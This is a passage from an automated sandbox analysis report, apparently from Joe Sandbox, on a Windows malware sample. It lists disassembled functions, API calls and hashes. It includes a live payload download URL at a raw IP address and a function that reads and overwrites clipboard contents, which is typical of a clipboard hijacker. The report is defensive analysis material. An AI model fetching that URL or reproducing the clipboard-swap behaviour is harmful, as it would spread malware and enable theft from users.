                                                  • Instruction Fuzzy Hash: 1801F9B1E0021C5ADB24FA25EC46BEF7768AB41304F0402FFA705E31C1D9785E45CA88
                                                  Function 0042E134 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 452 42e134-42e13f 453 42e141-42e153 call 42eae9 call 42a5bd 452->453 454 42e155-42e168 call 42e0eb 452->454 468 42e1a5-42e1a8 453->468 460 42e196 454->460 461 42e16a-42e187 CreateThread 454->461 465 42e198-42e1a4 call 42e05d 460->465 463 42e1a9-42e1ae 461->463 464 42e189-42e195 GetLastError call 42eab3 461->464 466 42e1b0-42e1b3 463->466 467 42e1b5-42e1b7 463->467 464->460 465->468 466->467 467->465
                                                  APIs
                                                  • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                  • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                  • __dosmaperr.LIBCMT ref: 0042E190
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2744730728-0
                                                  • Opcode ID: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                  • Instruction ID: e33ff4e630afc97a712763e24a24b73512c1ee0121ef7b9dc61686095db8a569
                                                  • Opcode Fuzzy Hash: f788247bfe16cd787040539d6f1c9311eafedbd5b023f877c643640da45ad27a
                                                  • Instruction Fuzzy Hash: 7F01D236600229ABDB119FA3FC05AAF3B69EF81360F50013AF91582210DB358921DBA8
                                                  Function 00434775 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 473 434775-43478d call 439941 476 4347a0-4347b6 SetFilePointerEx 473->476 477 43478f-434794 call 42eae9 473->477 479 4347c7-4347d1 476->479 480 4347b8-4347c5 GetLastError call 42eab3 476->480 483 43479a-43479e 477->483 482 4347d3-4347e8 479->482 479->483 480->483 486 4347ed-4347f2 482->486 483->486
                                                  APIs
                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                  • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                  • __dosmaperr.LIBCMT ref: 004347BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2336955059-0
                                                  • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                  • Instruction ID: 3f4161a45120eee3ca6c804ab5e0c8b7ff266a4415271cac2496bd2984e95623
                                                  • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                  • Instruction Fuzzy Hash: CC016836610114ABCB159FAADC058EF7B29EFCA730F24030AF814872C0EB74AD418794
                                                  Function 00402BCD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 487 402bcd-402bf9 RegCreateKeyExW 488 402bfb-402c0d RegSetValueExW 487->488 489 402c0f-402c12 487->489 488->489 490 402c14-402c17 RegCloseKey 489->490 491 402c1d-402c23 489->491 490->491
                                                  APIs
                                                  • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                  • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID:
                                                  • API String ID: 1818849710-0
                                                  • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                  • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                  • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                  • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664
                                                  Function 0042E094 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 492 42e094-42e0a1 call 431f7e 495 42e0a3-42e0a6 ExitThread 492->495 496 42e0ac-42e0b4 492->496 496->495 497 42e0b6-42e0ba 496->497 498 42e0c1-42e0c7 497->498 499 42e0bc call 435516 497->499 501 42e0d4-42e0da 498->501 502 42e0c9-42e0cb 498->502 499->498 501->495 503 42e0dc-42e0de 501->503 502->501 504 42e0cd-42e0ce CloseHandle 502->504 503->495 505 42e0e0-42e0ea FreeLibraryAndExitThread 503->505 504->501
                                                  APIs
                                                    • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                    • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                    • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                  • ExitThread.KERNEL32 ref: 0042E0A6
                                                  • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                  • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                  • String ID:
                                                  • API String ID: 1198197534-0
                                                  • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                  • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                  • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                  • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698
                                                  Function 0043CFEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 506 43cfeb-43d005 call 43f961 509 43d007-43d00a 506->509 510 43d00c-43d024 call 43d05c 506->510 512 43d038-43d03b 509->512 513 43d029-43d037 call 43348a 510->513 513->512
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: 'C
                                                  • API String ID: 269201875-3508614867
                                                  • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                  • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                  • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                  • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
                                                  Function 004023BA Relevance: 3.1, APIs: 2, Instructions: 129windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                  • PostQuitMessage.USER32(00000000), ref: 00402583
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: MessagePostProcQuitWindow
                                                  • String ID:
                                                  • API String ID: 3873111417-0
                                                  • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                  • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                  • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                  • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                  Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(0000215D), ref: 00401562
                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$Sleep
                                                  • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                  • API String ID: 3358372957-2681926500
                                                  • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                  • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                  • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                  • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                  Function 03010E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,03010223,?,?), ref: 03010E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,03010223,?,?), ref: 03010E1E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction ID: eaa7b3b829bbe17f17affb38b45189ab451d72b32a1db896f519cb81e07c40e8
                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                  • Instruction Fuzzy Hash: 05D0123114512877DB502A95DC09BCDBB5CDF05B62F048011FB0DD9080C770954046E5
                                                  Function 004341A6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                  • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                  • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                  • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                  Function 004036C4 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock
                                                  • String ID:
                                                  • API String ID: 2638373210-0
                                                  • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                  • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                  • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                  • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                  Function 00402843 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                  • String ID:
                                                  • API String ID: 323602529-0
                                                  • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                  • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                  • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                  • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                  Function 00403CE7 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: H_prolog3_catch
                                                  • String ID:
                                                  • API String ID: 3886170330-0
                                                  • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                  • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                  • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                  • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                  Function 004327A5 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __wsopen_s
                                                  • String ID:
                                                  • API String ID: 3347428461-0
                                                  • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                  • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                  • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                  • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                  Function 004336C7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                  • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                  • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                  • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                  Function 0040FB31 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Exception@8Throw
                                                  • String ID:
                                                  • API String ID: 2005118841-0
                                                  • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                  • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                  • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                  • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                  Function 0043CD2A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                  • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                  • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                  • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                  Function 02D29F2D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02D29F7E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D29000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d29000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: fce88fbc4abbba0c1164d96201e8d9f4ee326715e2ef55a028cce1d6eb5dcf57
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: B9112B79A00208EFDB01DF98C995E98BBF5EF08350F158094FA489B361D375EA90DF90

                                                  Non-executed Functions

                                                  Function 03011947 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 03011951
                                                  • Sleep.KERNEL32(000011EB), ref: 0301195B
                                                    • Part of subcall function 0301CE9C: _strlen.LIBCMT ref: 0301CEB3
                                                  • OpenClipboard.USER32(00000000), ref: 03011988
                                                  • GetClipboardData.USER32(00000001), ref: 03011998
                                                  • _strlen.LIBCMT ref: 030119B4
                                                  • _strlen.LIBCMT ref: 030119E3
                                                  • _strlen.LIBCMT ref: 03011B27
                                                  • EmptyClipboard.USER32 ref: 03011B3D
                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 03011B4A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 03011B74
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 03011B7D
                                                  • GlobalFree.KERNEL32(00000000), ref: 03011B84
                                                  • CloseClipboard.USER32 ref: 03011BA8
                                                  • Sleep.KERNEL32(000002C7), ref: 03011BB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                  • String ID: 4#E$i
                                                  • API String ID: 4246938166-2480119546
                                                  • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                  • Instruction ID: 6e6e87e177aa230cffb60b4a1c94267fa4f35cfbf5a4c5304b5ce79624768522
                                                  • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                  • Instruction Fuzzy Hash: F0514634C02384DAE319DFA4ED457FDBBB8FF6A306F044228D901A6162EBB09685C759
                                                  Function 0301237D Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 030123B8
                                                  • GetClientRect.USER32(?,?), ref: 030123CD
                                                  • GetDC.USER32(?), ref: 030123D4
                                                  • CreateSolidBrush.GDI32(00646464), ref: 030123E7
                                                  • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 03012406
                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 03012427
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 03012432
                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 0301243B
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 0301245F
                                                  • SetBkMode.GDI32(?,00000001), ref: 030124EA
                                                  • _wcslen.LIBCMT ref: 03012502
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                  • String ID:
                                                  • API String ID: 1529870607-0
                                                  • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                  • Instruction ID: 912a36bfd177cbf6884a9afd9d5512e45b1d0b64e2c18f707b8c58eb05c7f646
                                                  • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                  • Instruction Fuzzy Hash: 3C71FC76900218AFDB22DF64DD85FAEB7BCEF49711F0041A5B609E6151DA70AF80CF14
                                                  Function 0043D698 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: 140d9b25ee328c450727642e5e1d4e7f582207a626e957b77947cf61397f8e0f
                                                  • Instruction ID: 704f0dc4c1cc7227d133c65a0813f8dc888d98eeea65dda385bca534dc2e7eac
                                                  • Opcode Fuzzy Hash: 140d9b25ee328c450727642e5e1d4e7f582207a626e957b77947cf61397f8e0f
                                                  • Instruction Fuzzy Hash: 37C26D71E096288FDB25DE29DD407EAB7B5EB48304F1451EBD80DE7280E778AE818F45
                                                  Function 0043B78E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                  • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID: ACP$OCP
                                                  • API String ID: 2299586839-711371036
                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                  • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                  • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                  Function 0304B9F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0304BD14,?,00000000), ref: 0304BA8E
                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0304BD14,?,00000000), ref: 0304BAB7
                                                  • GetACP.KERNEL32(?,?,0304BD14,?,00000000), ref: 0304BACC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
